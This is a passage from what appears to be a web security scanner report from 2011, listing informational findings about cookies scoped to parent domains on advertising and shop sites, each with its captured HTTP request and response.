TIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; uid=4325897289836481830; rrs=3%7C6%7C9%7C4%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15167%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Set-Cookie: pf=S75Tx67zHlqJEqjM2EpYohyQmYHijzPhSURiZdWBt_mIAwkcA0x7pAMOQ8HX-tAoPwLHSpO1dFMRfUIqRRj7O8Bymq9LvAUz5_ne2Gc83NMHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_wu9pn5eTDfXokdHWgv_KeSzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25tnEZo1QLIx3A2B_Zq8odU2eiU467uOPvqZNUB0D-Z1h-Ye081m6oj-PGJfEQ6zkfS-V8iUpuZ8eodRw_lv4giezXN6TUonRbapcFN61G2o5g0IZKzKM_gBe3dP1E8FWQkM2fHCdNoeFK3r8z3rr_IMZGe2RqXjfUSv4PoS9BBdLPDTtDv5lO-7qW24wGeBDKGVRc1PUdvmcIfa70fwlgva-qLtly5tg-N0KJMS8LqLG_FacEC-83hgcFizrbdl-nuZiKc3wX7GiaI0EAPGkBVFePfSQ9yWsEBRfjuW4AHrUV5yIcO0NRkDqgMD2WAQJbF49vWqArbDJ0yoqifuBT8rwLezGBmoueobB2WMNaTxX7mxpMrQn0yES1bZJmLjjZIAkmIJxZ7xeYCj5l4gUPXVoOVFXuczpXr_MUqk_vCUthA8oixyElU3ANl1dD2qYov9BuL8l-AQdbit5mSqhcAge1f9v2DKdrS7tpbkEM0iqxaG6RswzxutKhO2dQbnqnli05-eD_Or7WQnS-BLdBqYTneq0zKFqU49VNcF9tmltxT1NaEJFhMivfKM5iLXXLqA3JaBVqauWRwqI8S_3Fn-BME0WtjmL-sTf3Nf93Yws_1ud7s0IRU8-3diGW0YihRapWhNVwJ8XDqeMYmLmHyM3mIk7c61SB7-8FMxyiC0cSExJSH89TrP0KtOzOBfTvxHeJg54zjksNPu1zZwzGr7u7c4UKg_yErLQJ0YMrQaTHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Tue, 12 Jul 2011 16:35:47 GMT

10.36. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:36:05 GMT; path=/hc/57386690; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagInPage&lpCallId=308320658747-492943215649&protV=20&lpjson=1&page=http%3A//www.homedepot.com/&id=7510587419&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-global-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=265974457269152000; HumanClickSiteContainerID_57386690=STANDALONE; LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDQAQCCBQS=IPKCCCKDEINMHCPDPDNCPOFP; HumanClickACTIVE=1310488554952

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
Set-Cookie: LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:36:05 GMT; path=/hc/57386690; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jul 2011 16:36:05 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"308320658747-492943215649","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

10.37. http://store.popcap.com/cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://store.popcap.com
Path:	/cart.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lv=1310503701; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cart.php?a=a1&oid=11464&icid=bwbundle_HP_PLARGE_pc_EN HTTP/1.1
Host: store.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; lv=1310503202; user_profile=003000000000000; s_cc=true; __utmb=163442877; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DInformation%252520%25253E%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//store.popcap.com/cart.php%25253Fa%25253Da1%252526oid%25253D11464%252526icid%25253Dbwbundle_HP_PLARGE_pc_EN%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 20:48:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lv=1310503701; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Location: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 0

10.38. https://store.popcap.com/payment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. http://www.burstnet.com/enlightn/3599//E519/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/3599//E519/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:51 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3599//E519/?1310503191 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.40. http://www.burstnet.com/enlightn/3893//392A/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/3893//392A/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3893//392A/?1310503167 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:28 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.41. http://www.burstnet.com/enlightn/5158//2CB4/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/5158//2CB4/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/5158//2CB4/?1310503209 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.42. http://www.burstnet.com/enlightn/8117//3E06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.43. http://www.burstnet.com/enlightn/8171/99D2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8171/99D2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd; path=/; expires=Thu, 12-Jul-2012 20:39:27 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171/99D2/?01AD=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q&01RI=364AB5B4B4DE32D&01NA= HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:27 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; expires=Tue, 09-Aug-2011 20:39:27 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd; path=/; expires=Thu, 12-Jul-2012 20:39:27 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

10.44. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYlT,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYlT,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT
